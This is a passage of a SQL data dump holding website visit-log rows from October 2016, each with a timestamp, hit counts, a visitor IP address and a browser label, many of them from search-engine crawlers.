8963,1476816353,1,1,0,0,'163.172.64.187','other'),(68964,1476817003,2,0,2,0,'66.249.64.27',''),(68965,1476817592,1,1,0,0,'164.132.161.94','other'),(68966,1476817631,1,1,0,0,'51.255.65.76','other'),(68967,1476817778,2,2,0,0,'5.83.17.159','firefox'),(68968,1476818338,1,1,0,0,'164.132.161.80','other'),(68969,1476818503,1,1,0,0,'66.102.9.25','other'),(68970,1476818689,1,0,1,0,'66.249.64.24',''),(68971,1476818719,1,1,0,0,'163.172.65.180','other'),(68972,1476819826,1,1,0,0,'91.196.178.163','other'),(68973,1476820597,1,1,0,0,'164.132.161.36','other'),(68974,1476820961,1,1,0,0,'163.172.66.181','other'),(68975,1476821491,1,1,0,0,'163.172.66.14','other'),(68976,1476822167,1,1,0,0,'51.255.65.97','other'),(68977,1476822237,1,1,0,0,'66.102.9.29','other'),(68978,1476822345,2,0,2,0,'66.249.64.21',''),(68979,1476822423,1,1,0,0,'5.255.253.30','other'),(68980,1476823321,1,1,0,0,'141.8.132.30','other'),(68981,1476823459,1,1,0,0,'5.255.253.68','other'),(68982,1476823492,1,1,0,0,'178.154.189.6','other'),(68983,1476823513,1,1,0,0,'51.255.65.9','other'),(68984,1476823625,1,1,0,0,'5.255.253.51','other'),(68985,1476823788,1,1,0,0,'51.255.65.28','other'),(68986,1476823926,1,0,1,0,'66.249.64.21',''),(68987,1476823972,1,0,1,0,'66.249.64.79',''),(68988,1476823983,1,1,0,0,'51.255.65.84','other'),(68989,1476824928,1,1,0,0,'164.132.161.44','other'),(68990,1476824984,1,0,1,0,'68.180.229.190',''),(68991,1476825146,1,1,0,0,'164.132.161.42','other'),(68992,1476825240,1,1,0,0,'178.154.149.10','other'),(68993,1476825546,1,1,0,0,'91.196.178.164','chrome'),(68994,1476825942,1,1,0,0,'66.102.9.27','other'),(68995,1476826046,1,1,0,0,'78.111.187.1','chrome'),(68996,1476826507,1,1,0,0,'130.193.50.34','other'),(68997,1476826524,1,0,1,0,'66.249.64.21',''),(68998,1476827058,1,1,0,0,'5.255.253.30','other'),(68999,1476827412,1,1,0,0,'164.132.161.96','other'),(69000,1476827659,1,1,0,0,'164.132.161.63','other'),(69001,1476828476,1,1,0,0,'51.255.65.22','other'),(69002,1476828478,1,0,1,0,'66.249.64.24',''),(69003,1476829438,1,1,0,0,'66.102.9.27','other'),(69004,1476829470,1,1,0,0,'130.180.208.210','chrome'),(69005,1476830056,1,1,0,0,'5.255.253.68','other'),(69006,1476830132,1,1,0,0,'40.77.167.53','other'),(69007,1476830138,1,1,0,0,'51.255.65.35','other'),(69008,1476830800,1,1,0,0,'130.193.50.34','other'),(69009,1476831358,1,1,0,0,'164.132.161.72','other'),(69010,1476831623,1,1,0,0,'163.172.64.228','other'),(69011,1476832746,1,1,0,0,'130.193.50.34','other'),(69012,1476832919,1,1,0,0,'164.132.161.39','other'),(69013,1476833061,1,1,0,0,'66.102.9.29','other'),(69014,1476833102,1,1,0,0,'163.172.64.251','other'),(69015,1476833215,1,1,0,0,'164.132.161.70','other'),(69016,1476833425,1,1,0,0,'51.255.65.21','other'),(69017,1476833492,1,1,0,0,'164.132.161.19','other'),(69018,1476833495,1,1,0,0,'163.172.64.199','other'),(69019,1476834453,2,2,0,0,'130.193.50.34','other'),(69020,1476834689,1,1,0,0,'164.132.161.4','other'),(69021,1476835530,1,0,1,0,'66.249.64.27',''),(69022,1476835693,1,0,1,0,'66.249.64.21',''),(69023,1476835747,1,1,0,0,'141.8.183.25','other'),(69024,1476835943,1,1,0,0,'130.193.50.34','other'),(69025,1476836032,1,1,0,0,'163.172.66.60','other'),(69026,1476836116,1,1,0,0,'51.255.65.21','other'),(69027,1476836451,1,0,1,0,'66.249.64.24',''),(69028,1476836639,1,1,0,0,'66.102.9.27','other'),(69029,1476836778,1,1,0,0,'163.172.64.217','other'),(69030,1476836901,1,1,0,0,'141.8.183.25','other'),(69031,1476837328,1,1,0,0,'164.132.161.33','other'),(69032,1476837595,1,1,0,0,'163.172.65.194','other'),(69033,1476838247,1,1,0,0,'163.172.66.12','other'),(69034,1476838525,3,3,0,0,'130.193.50.34','other'),(69035,1476838571,1,1,0,0,'51.255.65.45','other'),(69036,1476838813,1,1,0,0,'163.172.66.22','other'),(69037,1476839081,1,1,0,0,'141.8.183.25','other'),(69038,1476839134,2,0,2,0,'66.249.64.24',''),(69039,1476839152,1,1,0,0,'163.172.66.175','other'),(69040,1476839218,1,0,1,0,'66.249.64.69',''),(69041,1476839549,1,1,0,0,'163.172.65.242','other'),(69042,1476840137,1,1,0,0,'163.172.66.95','other'),(69043,1476840251,1,1,0,0,'66.102.9.29','other'),(69044,1476840841,2,2,0,0,'66.249.64.21','chrome'),(69045,1476840849,1,1,0,0,'66.249.64.24','chrome'),(69046,1476841318,2,2,0,0,'130.193.50.34','other'),(69047,1476841851,2,2,0,0,'141.8.183.25','other'),(69048,1476842100,1,1,0,0,'141.8.142.58','other'),(69049,1476842140,2,2,0,0,'130.193.51.19','other'),(69050,1476842320,1,1,0,0,'130.193.50.34','other'),(69051,1476843117,1,1,0,0,'189.89.125.52','firefox'),(69052,1476843217,1,1,0,0,'66.102.9.27','other'),(69053,1476843350,1,1,0,0,'141.8.142.58','other'),(69054,1476843711,1,0,1,0,'66.249.64.21',''),(69055,1476843725,1,1,0,0,'130.193.51.19','other'),(69056,1476843804,1,1,0,0,'164.132.161.25','other'),(69057,1476844171,1,0,1,0,'66.249.64.24',''),(69058,1476844779,2,2,0,0,'130.193.50.34','other'),(69059,1476845983,1,0,1,0,'66.249.64.69',''),(69060,1476846083,1,1,0,0,'141.8.183.25','other'),(69061,1476846293,1,1,0,0,'51.255.65.33','other'),(69062,1476846671,1,1,0,0,'51.255.65.39','other'),(69063,1476846977,1,1,0,0,'164.132.161.78','other'),(69064,1476847064,1,0,1,0,'66.249.64.27',''),(69065,1476847243,1,1,0,0,'51.255.65.37','other'),(69066,1476847782,1,1,0,0,'216.81.17.13','other'),(69067,1476848073,1,1,0,0,'130.193.50.34','other'),(69068,1476848759,1,1,0,0,'163.172.66.35','other'),(69069,1476849430,1,1,0,0,'66.102.9.27','chrome'),(69070,1476849747,1,1,0,0,'141.8.183.25','other'),(69071,1476850177,1,0,1,0,'66.249.64.21',''),(69072,1476850533,1,1,0,0,'40.77.167.53','other'),(69073,1476850550,1,1,0,0,'93.158.152.84','other'),(69074,1476851037,1,0,1,0,'66.249.64.27',''),(69075,1476851051,1,1,0,0,'163.172.66.137','other'),(69076,1476851403,1,1,0,0,'141.8.142.58','other'),(69077,1476851408,1,1,0,0,'5.255.253.67','other'),(69078,1476851802,1,1,0,0,'163.172.66.122','other'),(69079,1476852109,1,1,0,0,'93.158.152.51','other'),(69080,1476852539,2,2,0,0,'130.193.50.34','other'),(69081,1476852697,1,1,0,0,'51.255.65.75','other'),(69082,1476853599,1,1,0,0,'163.172.66.29','other'),(69083,1476853786,1,1,0,0,'51.255.65.82','other'),(69084,1476853804,1,1,0,0,'95.25.22.214','other'),(69085,1476853821,1,1,0,0,'91.196.178.34','chrome'),(69086,1476854421,1,1,0,0,'164.132.161.45','other'),(69087,1476854595,2,0,2,0,'66.249.64.27',''),(69088,1476854635,1,0,1,0,'66.249.64.21',''),(69089,1476854728,1,1,0,0,'91.196.178.70','firefox'),(69090,1476855288,1,1,0,0,'109.104.162.214','chrome'),(69091,1476855549,1,1,0,0,'141.8.183.25','other'),(69092,1476855970,1,1,0,0,'91.196.178.70','chrome'),(69093,1476856051,1,1,0,0,'163.172.66.163','other'),(69094,1476856292,1,1,0,0,'5.255.253.67','other'),(69095,1476856721,1,1,0,0,'164.132.161.69','other'),(69096,1476856827,1,0,1,0,'66.249.64.24',''),(69097,1476857115,1,1,0,0,'164.132.161.32','other'),(69098,1476857173,1,1,0,0,'94.178.147.233','opera'),(69099,1476857257,1,1,0,0,'51.255.65.80','other'),(69100,1476857842,1,1,0,0,'66.102.9.25','other'),(69101,1476857916,1,1,0,0,'163.172.65.119','other'),(69102,1476858530,1,0,1,0,'66.249.64.21',''),(69103,1476858704,1,1,0,0,'163.172.66.139','other'),(69104,1476858845,1,0,1,0,'66.249.64.27',''),(69105,1476858898,1,1,0,0,'164.132.161.48','other'),(69106,1476858981,2,2,0,0,'130.193.50.34','other'),(69107,1476859158,1,1,0,0,'91.196.178.68','chrome'),(69108,1476859283,2,2,0,0,'91.196.178.70','chrome'),(69109,1476859778,1,1,0,0,'164.132.161.67','other'),(69110,1476859889,4,4,0,0,'130.193.50.34','other'),(69111,1476860447,1,1,0,0,'130.193.51.19','other'),(69112,1476860524,1,1,0,0,'141.8.183.25','other'),(69113,1476860636,1,0,1,0,'66.249.64.21',''),(69114,1476860683,1,0,1,0,'66.249.64.27',''),(69115,1476860738,1,0,1,0,'66.249.64.69',''),(69116,1476860835,1,1,0,0,'164.132.161.23','other'),(69117,1476860902,1,1,0,0,'91.196.178.167','chrome'),(69118,1476860973,1,1,0,0,'91.196.178.66','firefox'),(69119,1476861359,1,1,0,0,'163.172.66.126','other'),(69120,1476861571,1,1,0,0,'164.132.161.42','other'),(69121,1476861631,1,1,0,0,'164.132.161.47','other'),(69122,1476861803,1,1,0,0,'51.255.65.77','other'),(69123,1476862083,1,1,0,0,'130.180.219.22','chrome'),(69124,1476862525,1,1,0,0,'141.8.142.58','other'),(69125,1476862656,3,3,0,0,'130.193.50.34','other'),(69126,1476862720,3,3,0,0,'130.193.51.19','other'),(69127,1476862862,1,0,1,0,'66.249.64.24',''),(69128,1476863006,2,2,0,0,'141.8.183.25','other'),(69129,1476863147,1,1,0,0,'66.102.6.217','other'),(69130,1476863207,1,0,1,0,'66.249.64.27',''),(69131,1476863227,1,1,0,0,'66.102.6.219','other'),(69132,1476863301,1,1,0,0,'91.196.178.67','firefox'),(69133,1476863337,1,1,0,0,'51.255.65.13','other'),(69134,1476863439,1,1,0,0,'91.196.178.71','chrome'),(69135,1476863720,1,1,0,0,'163.172.65.56','other'),(69136,1476863843,1,1,0,0,'163.172.66.132','other'),(69137,1476864105,1,1,0,0,'91.196.178.70','chrome'),(69138,1476864620,1,1,0,0,'163.172.64.245','other'),(69139,1476865397,1,0,1,0,'68.180.229.27',''),(69140,1476865823,1,1,0,0,'94.179.101.180','chrome'),(69141,1476865911,1,1,0,0,'91.196.178.167','chrome'),(69142,1476866333,2,2,0,0,'130.193.50.34','other'),(69143,1476866437,1,1,0,0,'141.8.183.25','other'),(69144,1476866708,1,0,1,0,'66.249.64.74',''),(69145,1476866994,1,1,0,0,'176.125.42.177','chrome'),(69146,1476867208,1,1,0,0,'164.132.161.80','other'),(69147,1476867780,1,1,0,0,'37.52.129.207','chrome'),(69148,1476868792,1,1,0,0,'163.172.65.52','other'),(69149,1476869311,1,1,0,0,'130.193.50.34','other'),(69150,1476869493,1,0,1,0,'66.249.64.27',''),(69151,1476869717,1,1,0,0,'164.132.161.76','other'),(69152,1476870059,1,1,0,0,'163.172.66.107','other'),(69153,1476870063,2,2,0,0,'91.196.178.68','chrome'),(69154,1476870417,1,0,1,0,'66.249.64.24',''),(69155,1476870499,1,0,1,0,'66.249.64.21',''),(69156,1476871023,1,1,0,0,'178.92.171.103','firefox'),(69157,1476871078,1,1,0,0,'163.172.66.130','other'),(69158,1476871281,1,1,0,0,'82.145.222.135','chrome'),(69159,1476871295,1,1,0,0,'164.132.161.71','other'),(69160,1476871333,1,0,1,0,'66.249.64.24',''),(69161,1476871482,1,1,0,0,'163.172.65.193','other'),(69162,1476871668,1,1,0,0,'195.5.10.179','chrome'),(69163,1476872243,1,1,0,0,'66.102.9.27','other'),(69164,1476872278,1,1,0,0,'130.193.51.19','other'),(69165,1476872365,1,1,0,0,'164.132.161.59','other'),(69166,1476872916,1,1,0,0,'178.95.83.177','chrome'),(69167,1476872944,1,1,0,0,'130.193.50.34','other'),(69168,1476874070,1,1,0,0,'66.249.88.25','other'),(69169,1476875149,1,1,0,0,'164.132.161.87','other'),(69170,1476875337,1,1,0,0,'95.134.165.102','chrome'),(69171,1476875534,1,1,0,0,'163.172.66.57','other'),(69172,1476876341,1,1,0,0,'141.8.142.58','other'),(69173,1476876800,1,1,0,0,'163.172.64.222','other'),(69174,1476877094,1,1,0,0,'91.196.178.167','chrome'),(69175,1476877569,1,1,0,0,'163.172.65.108','other'),(69176,1476877724,1,1,0,0,'164.132.161.43','other'),(69177,1476877834,1,1,0,0,'51.255.65.81','other'),(69178,1476877944,1,1,0,0,'82.145.220.251','chrome'),(69179,1476878038,1,1,0,0,'66.249.88.25','other'),(69180,1476878132,1,1,0,0,'130.193.50.34','other'),(69181,1476878493,1,1,0,0,'163.172.65.61','other'),(69182,1476878583,1,1,0,0,'195.5.10.179','chrome'),(69183,1476878617,1,1,0,0,'51.255.65.25','other'),(69184,1476878954,1,1,0,0,'176.126.162.25','firefox'),(69185,1476879142,1,1,0,0,'163.172.64.242','other'),(69186,1476879340,1,1,0,0,'163.172.65.109','other'),(69187,1476879550,1,1,0,0,'141.8.183.25','other'),(69188,1476879679,3,3,0,0,'130.193.50.34','other'),(69189,1476880535,1,1,0,0,'163.172.66.61','other'),(69190,1476880829,1,1,0,0,'164.132.161.51','other'),(69191,1476881148,1,1,0,0,'164.132.161.25','other'),(69192,1476881466,1,1,0,0,'46.149.84.148','firefox'),(69193,1476881584,1,1,0,0,'46.200.40.56','chrome'),(69194,1476881720,1,1,0,0,'51.255.65.15','other'),(69195,1476881999,1,1,0,0,'163.172.65.215','other'),(69196,1476882451,1,1,0,0,'91.196.178.71','chrome'),(69197,1476882848,1,0,1,0,'66.249.64.21',''),(69198,1476883177,1,1,0,0,'163.172.66.83','other'),(69199,1476883293,1,1,0,0,'85.115.62.180','other'),(69200,1476884139,1,1,0,0,'91.196.178.135','chrome'),(69201,1476885187,1,1,0,0,'91.196.178.135','chrome'),(69202,1476885898,1,1,0,0,'180.76.15.13','other'),(69203,1476885937,1,1,0,0,'37.55.200.13','chrome'),(69204,1476886058,1,1,0,0,'91.196.178.72','firefox'),(69205,1476886617,2,2,0,0,'130.193.50.34','other'),(69206,1476886783,1,1,0,0,'66.102.9.29','other'),(69207,1476887011,1,1,0,0,'40.77.167.53','other'),(69208,1476887148,1,1,0,0,'163.172.65.245','other'),(69209,1476887359,1,1,0,0,'64.246.165.190','firefox'),(69210,1476888169,1,1,0,0,'180.76.15.144','other'),(69211,1476888312,1,1,0,0,'46.201.52.121','chrome'),(69212,1476889547,1,1,0,0,'91.196.178.38','firefox'),(69213,1476889579,1,1,0,0,'163.172.66.14','other'),(69214,1476889803,1,1,0,0,'51.255.65.10','other'),(69215,1476890270,1,1,0,0,'164.132.161.82','other'),(69216,1476890602,1,1,0,0,'164.132.161.39','other'),(69217,1476890643,1,1,0,0,'51.255.65.57','other'),(69218,1476891743,1,1,0,0,'163.172.65.184','other'),(69219,1476892700,1,1,0,0,'66.102.9.29','other'),(69220,1476892707,1,1,0,0,'180.76.15.27','other'),(69221,1476892968,1,1,0,0,'51.255.65.40','other'),(69222,1476893622,1,0,1,0,'66.249.64.27',''),(69223,1476895512,1,1,0,0,'130.193.50.34','other'),(69224,1476896177,1,1,0,0,'91.196.178.66','firefox'),(69225,1476896697,1,1,0,0,'94.179.61.81','chrome'),(69226,1476896766,1,1,0,0,'66.249.64.24','chrome'),(69227,1476897071,1,1,0,0,'164.132.161.18','other'),(69228,1476897193,1,1,0,0,'91.196.178.98','chrome'),(69229,1476897486,1,1,0,0,'51.255.65.22','other'),(69230,1476897696,1,1,0,0,'163.172.66.162','other'),(69231,1476897976,1,1,0,0,'163.172.64.184','other'),(69232,1476898101,1,1,0,0,'46.98.158.91','chrome'),(69233,1476898314,1,1,0,0,'66.102.9.29','chrome'),(69234,1476898502,1,1,0,0,'163.172.65.18','other'),(69235,1476899176,1,1,0,0,'94.179.72.140','chrome'),(69236,1476899446,1,1,0,0,'164.132.161.33','other'),(69237,1476899766,1,1,0,0,'66.249.64.27','chrome'),(69238,1476899820,1,1,0,0,'93.158.152.61','other'),(69239,1476899877,1,1,0,0,'66.249.64.69','chrome'),(69240,1476900035,1,0,1,0,'66.249.64.79',''),(69241,1476900050,6,6,0,0,'62.210.181.123','other'),(69243,1476900099,1,1,0,0,'94.179.209.79','firefox'),(69244,1476900426,1,1,0,0,'163.172.66.161','other'),(69245,1476900978,2,2,0,0,'130.193.51.19','other'),(69246,1476901015,1,1,0,0,'5.255.253.68','other'),(69247,1476901304,1,1,0,0,'66.102.9.29','other'),(69248,1476901774,1,1,0,0,'178.154.189.31','other'),(69249,1476902938,1,1,0,0,'164.132.161.9','other'),(69250,1476903856,1,1,0,0,'66.102.9.29','other'),(69251,1476904581,1,1,0,0,'94.179.7.109','firefox'),(69252,1476904634,1,1,0,0,'163.172.65.191','other'),(69253,1476904714,1,0,1,0,'68.180.229.27',''),(69254,1476904774,1,1,0,0,'163.172.66.27','other'),(69255,1476905000,1,1,0,0,'141.8.132.30','other'),(69256,1476905005,1,1,0,0,'40.77.167.6','other'),(69257,1476905029,1,1,0,0,'91.196.178.167','chrome'),(69258,1476905554,1,1,0,0,'94.179.5.162','chrome'),(69259,1476905791,1,1,0,0,'51.255.65.49','other'),(69260,1476906121,1,1,0,0,'141.8.142.62','other'),(69261,1476906196,1,1,0,0,'51.255.65.58','other'),(69262,1476906308,1,1,0,0,'141.8.183.19','other'),(69263,1476906351,1,1,0,0,'163.172.65.131','other'),(69264,1476906457,1,1,0,0,'163.172.64.223','other'),(69265,1476906643,1,1,0,0,'5.255.253.67','other'),(69266,1476907405,1,1,0,0,'51.255.65.50','other'),(69267,1476907914,1,1,0,0,'141.8.132.52','other'),(69268,1476909012,1,1,0,0,'163.172.65.131','other'),(69269,1476909200,1,1,0,0,'164.132.161.87','other'),(69270,1476910110,1,1,0,0,'163.172.65.193','other'),(69271,1476910900,1,1,0,0,'164.132.161.96','other'),(69272,1476911387,1,1,0,0,'163.172.66.83','other'),(69273,1476912093,1,1,0,0,'163.172.66.81','other'),(69274,1476912444,1,1,0,0,'164.132.161.64','other'),(69275,1476912471,1,1,0,0,'163.172.64.234','other'),(69276,1476912983,1,1,0,0,'164.132.161.17','other'),(69277,1476913299,1,1,0,0,'51.255.65.5','other'),(69278,1476913640,1,1,0,0,'164.132.161.14','other'),(69279,1476913642,1,1,0,0,'163.172.65.232','other'),(69280,1476913736,1,1,0,0,'163.172.65.63','other'),(69281,1476914416,1,1,0,0,'130.193.50.34','other'),(69282,1476914595,1,1,0,0,'164.132.161.71','other'),(69283,1476915530,1,1,0,0,'51.255.65.66','other'),(69284,1476915759,1,1,0,0,'164.132.161.61','other'),(69285,1476916265,1,1,0,0,'164.132.161.30','other'),(69286,1476917657,2,0,2,0,'66.249.64.21',''),(69287,1476918340,1,1,0,0,'130.193.50.34','other'),(69288,1476918403,1,1,0,0,'66.102.9.29','other'),(69289,1476918798,1,1,0,0,'163.172.65.203','other'),(69290,1476920378,1,1,0,0,'51.255.65.56','other'),(69291,1476920938,1,1,0,0,'51.255.65.4','other'),(69292,1476921145,1,1,0,0,'51.255.65.59','other'),(69293,1476921374,1,1,0,0,'130.193.50.34','other'),(69294,1476921931,1,1,0,0,'163.172.66.47','other'),(69295,1476922077,1,1,0,0,'164.132.161.74','other'),(69296,1476922684,1,1,0,0,'37.110.39.141','msie'),(69297,1476923076,1,1,0,0,'51.255.65.90','other'),(69298,1476925107,1,1,0,0,'130.193.50.34','other'),(69299,1476927250,1,1,0,0,'141.8.132.10','other'),(69300,1476927571,1,1,0,0,'164.132.161.73','other'),(69301,1476928060,1,1,0,0,'163.172.66.152','other'),(69302,1476928169,1,1,0,0,'163.172.66.70','other'),(69303,1476928311,1,1,0,0,'109.63.164.249','msie'),(69304,1476928952,1,1,0,0,'163.172.65.235','other'),(69305,1476929123,1,1,0,0,'130.193.51.14','other'),(69306,1476929127,2,2,0,0,'130.193.50.34','other'),(69307,1476930034,1,0,1,0,'66.249.64.27',''),(69308,1476930851,1,1,0,0,'178.94.172.223','chrome'),(69309,1476931890,1,1,0,0,'141.8.183.25','other'),(69310,1476932228,1,1,0,0,'51.255.65.20','other'),(69311,1476932654,1,1,0,0,'141.8.142.58','other'),(69312,1476932671,1,1,0,0,'66.102.9.27','other'),(69313,1476933057,1,1,0,0,'141.8.183.25','other'),(69314,1476933568,1,1,0,0,'130.193.51.19','other'),(69315,1476933707,1,1,0,0,'164.132.161.16','other'),(69316,1476933718,1,1,0,0,'141.8.142.58','other'),(69317,1476934227,1,1,0,0,'141.8.183.25','other'),(69318,1476934548,1,1,0,0,'163.172.65.181','other'),(69319,1476934837,1,1,0,0,'163.172.66.103','other'),(69320,1476935452,3,3,0,0,'130.193.50.34','other'),(69321,1476935693,1,1,0,0,'66.102.9.27','chrome'),(69322,1476936187,1,1,0,0,'163.172.65.54','other'),(69323,1476936519,1,1,0,0,'40.77.167.53','other'),(69324,1476936594,1,1,0,0,'164.132.161.87','other'),(69325,1476936779,1,1,0,0,'51.255.65.35','other'),(69326,1476936934,7,7,0,0,'130.193.50.34','other'),(69327,1476937181,1,1,0,0,'163.172.66.12','other'),(69328,1476937182,7,7,0,0,'141.8.183.25','other'),(69329,1476937508,2,2,0,0,'130.193.51.19','other'),(69330,1476938662,1,1,0,0,'164.132.161.80','other'),(69331,1476939000,2,2,0,0,'141.8.183.25','other'),(69332,1476939021,1,1,0,0,'66.102.9.29','other'),(69333,1476939024,2,2,0,0,'130.193.50.34','other'),(69334,1476939630,1,0,1,0,'66.249.64.24',''),(69335,1476940231,2,2,0,0,'130.193.50.34','other'),(69336,1476940990,1,1,0,0,'163.172.66.163','other'),(69337,1476941418,5,5,0,0,'130.193.50.34','other'),(69338,1476942363,1,1,0,0,'51.255.65.66','other'),(69339,1476942943,1,1,0,0,'163.172.66.53','other'),(69340,1476942963,1,1,0,0,'66.102.9.25','other'),(69341,1476943222,1,1,0,0,'163.172.65.69','other'),(69342,1476943280,1,1,0,0,'91.196.178.67','chrome'),(69343,1476943315,8,8,0,0,'91.196.178.103','other'),(69344,1476943879,1,1,0,0,'163.172.64.241','other'),(69345,1476943956,1,1,0,0,'37.52.16.66','msie'),(69346,1476944075,1,1,0,0,'141.8.183.25','other'),(69347,1476944146,1,1,0,0,'163.172.65.210','other'),(69348,1476944242,1,1,0,0,'91.196.178.67','chrome'),(69349,1476944371,1,1,0,0,'163.172.64.216','other'),(69350,1476944386,2,2,0,0,'130.193.50.34','other'),(69351,1476944616,1,1,0,0,'82.207.49.150','chrome'),(69352,1476945265,1,1,0,0,'91.196.178.67','chrome'),(69353,1476945677,1,1,0,0,'163.172.66.26','other'),(69354,1476946447,2,2,0,0,'130.193.50.34','other'),(69355,1476947035,1,1,0,0,'37.52.17.170','chrome'),(69356,1476947269,1,1,0,0,'164.132.161.27','other'),(69357,1476947457,1,1,0,0,'31.148.255.20','firefox'),(69358,1476947540,1,1,0,0,'180.76.15.161','other'),(69359,1476947690,1,1,0,0,'130.193.50.34','other'),(69360,1476948377,1,1,0,0,'141.0.13.210','other'),(69361,1476949188,1,1,0,0,'130.193.50.34','other'),(69362,1476949434,1,1,0,0,'130.180.216.15','chrome'),(69363,1476950276,1,1,0,0,'130.193.50.34','other'),(69364,1476950753,1,1,0,0,'141.8.183.25','other'),(69365,1476951235,1,1,0,0,'130.193.50.34','other'),(69366,1476951763,1,1,0,0,'91.196.177.110','chrome'),(69367,1476951770,1,1,0,0,'91.196.178.72','chrome'),(69368,1476951992,1,1,0,0,'163.172.66.152','other'),(69369,1476952053,20,20,0,0,'193.111.140.153','other'),(69370,1476952122,1,1,0,0,'157.55.39.97','other'),(69371,1476952443,1,1,0,0,'164.132.161.34','other'),(69372,1476952444,1,1,0,0,'94.178.147.166','opera'),(69373,1476952458,1,0,1,0,'66.249.64.24',''),(69374,1476952575,1,1,0,0,'91.196.178.165','chrome'),(69375,1476952704,1,0,1,0,'66.249.64.27',''),(69376,1476952812,1,1,0,0,'91.196.178.72','chrome'),(69377,1476953438,1,1,0,0,'66.102.9.29','other'),(69378,1476954154,1,1,0,0,'207.46.13.123','other'),(69379,1476955009,1,1,0,0,'193.194.127.207','chrome'),(69380,1476955925,1,1,0,0,'164.132.161.57','other'),(69381,1476955953,1,1,0,0,'130.193.50.34','other'),(69382,1476956324,1,1,0,0,'163.172.65.28','other'),(69383,1476956536,1,1,0,0,'51.255.65.97','other'),(69384,1476957163,1,1,0,0,'130.193.50.34','other'),(69385,1476957382,1,1,0,0,'141.8.183.25','other'),(69386,1476958310,1,1,0,0,'91.196.178.70','firefox'),(69387,1476958394,1,1,0,0,'91.196.178.68','chrome'),(69388,1476959092,1,1,0,0,'163.172.65.8','other'),(69389,1476959263,1,1,0,0,'130.193.50.34','other'),(69390,1476959559,1,1,0,0,'163.172.65.112','other'),(69391,1476960632,1,1,0,0,'178.93.67.218','chrome'),(69392,1476960706,1,1,0,0,'193.194.127.198','chrome'),(69393,1476960772,1,0,1,0,'66.249.64.24',''),(69394,1476960926,1,1,0,0,'163.172.66.57','other'),(69395,1476961072,1,1,0,0,'130.193.50.34','other'),(69396,1476961172,1,1,0,0,'91.207.245.150','chrome'),(69397,1476961557,1,1,0,0,'51.255.65.2','other'),(69398,1476961579,1,1,0,0,'130.180.218.129','firefox'),(69399,1476961595,1,1,0,0,'180.76.15.138','other'),(69400,1476961895,1,1,0,0,'141.8.183.25','other'),(69401,1476962032,1,1,0,0,'31.148.255.20','firefox'),(69402,1476962291,1,1,0,0,'91.196.178.68','chrome'),(69403,1476962342,1,1,0,0,'163.172.66.99','other'),(69404,1476962427,1,1,0,0,'91.196.178.67','firefox'),(69405,1476963599,1,1,0,0,'130.193.50.34','other'),(69406,1476963754,1,1,0,0,'178.92.201.206','chrome'),(69407,1476963764,1,1,0,0,'178.95.33.44','chrome'),(69408,1476963851,1,1,0,0,'92.113.42.0','firefox'),(69409,1476963886,1,1,0,0,'164.132.161.60','other'),(69410,1476964738,1,1,0,0,'91.196.178.68','chrome'),(69411,1476964748,1,1,0,0,'51.255.65.58','other'),(69412,1476964879,1,1,0,0,'78.111.190.249','chrome'),(69413,1476965424,1,1,0,0,'51.255.65.38','other'),(69414,1476965613,1,1,0,0,'180.76.15.27','other'),(69415,1476965642,1,1,0,0,'163.172.66.124','other'),(69416,1476965863,1,1,0,0,'164.132.161.96','other'),(69417,1476966054,1,1,0,0,'94.179.10.105','firefox'),(69418,1476966249,1,1,0,0,'178.95.170.255','chrome'),(69419,1476966693,1,1,0,0,'51.255.65.83','other'),(69420,1476967418,1,1,0,0,'163.172.65.132','other'),(69421,1476967712,1,1,0,0,'141.8.142.61','other'),(69422,1476967721,1,0,1,0,'68.180.229.27',''),(69423,1476967729,1,1,0,0,'40.77.167.6','other'),(69424,1476968122,1,1,0,0,'94.153.237.82','chrome'),(69425,1476968350,1,1,0,0,'66.102.9.29','other'),(69426,1476968354,1,1,0,0,'95.132.111.218','chrome'),(69427,1476968363,1,1,0,0,'91.196.178.68','firefox'),(69428,1476968436,1,1,0,0,'141.8.142.58','other'),(69429,1476968480,1,1,0,0,'91.196.178.70','firefox'),(69430,1476968486,1,1,0,0,'164.132.161.95','other'),(69431,1476968686,1,1,0,0,'141.8.183.25','other'),(69432,1476968793,1,1,0,0,'130.193.51.19','other'),(69433,1476968833,1,1,0,0,'185.26.182.31','opera'),(69434,1476968871,1,1,0,0,'195.49.151.89','chrome'),(69435,1476969066,1,1,0,0,'164.132.161.42','other'),(69436,1476969458,1,1,0,0,'51.255.65.13','other'),(69437,1476969762,1,0,1,0,'66.249.64.21',''),(69438,1476970404,1,1,0,0,'164.132.161.13','other'),(69439,1476970737,1,1,0,0,'66.249.64.21','chrome'),(69440,1476970864,1,1,0,0,'94.179.209.79','firefox'),(69441,1476971209,1,1,0,0,'163.172.66.104','other'),(69442,1476971731,1,1,0,0,'66.249.64.27','chrome'),(69443,1476972467,1,1,0,0,'141.8.183.25','other'),(69444,1476972795,1,1,0,0,'130.193.50.34','other'),(69445,1476973275,1,1,0,0,'37.52.129.207','chrome'),(69446,1476973708,1,1,0,0,'66.249.64.24','chrome'),(69447,1476974652,1,0,1,0,'66.249.64.21',''),(69448,1476974925,1,1,0,0,'164.132.161.42','other'),(69449,1476976017,1,0,1,0,'66.249.64.27',''),(69450,1476976179,1,0,1,0,'66.249.64.21',''),(69451,1476976264,1,1,0,0,'207.46.13.123','other'),(69452,1476977714,1,1,0,0,'51.255.65.18','other'),(69453,1476978093,1,1,0,0,'130.193.51.19','other'),(69454,1476978518,1,1,0,0,'94.179.4.190','chrome'),(69455,1476979156,1,1,0,0,'194.213.23.3','chrome'),(69456,1476979281,1,1,0,0,'130.193.50.34','other'),(69457,1476979357,1,1,0,0,'163.172.66.7','other'),(69458,1476979974,1,0,1,0,'66.249.64.21',''),(69459,1476980136,1,1,0,0,'141.8.183.25','other'),(69460,1476980408,1,1,0,0,'130.193.50.34','other'),(69461,1476980721,1,1,0,0,'163.172.65.217','other'),(69462,1476980877,1,1,0,0,'163.172.66.108','other'),(69463,1476981269,1,1,0,0,'130.193.50.32','other'),(69464,1476981395,1,1,0,0,'141.8.132.30','other'),(69465,1476982680,2,0,2,0,'66.249.64.21',''),(69466,1476982816,1,1,0,0,'66.102.9.27','other'),(69467,1476982937,1,0,1,0,'66.249.64.27',''),(69468,1476983241,1,1,0,0,'141.8.183.25','other'),(69469,1476984431,1,1,0,0,'91.196.178.36','chrome'),(69470,1476984739,1,1,0,0,'66.249.64.21','chrome'),(69471,1476985339,1,1,0,0,'94.179.209.79','firefox'),(69472,1476985723,2,1,1,0,'66.249.64.21',''),(69473,1476985765,1,0,1,0,'66.249.64.69',''),(69474,1476988504,1,1,0,0,'180.76.15.17','other'),(69475,1476988577,1,1,0,0,'180.76.15.145','o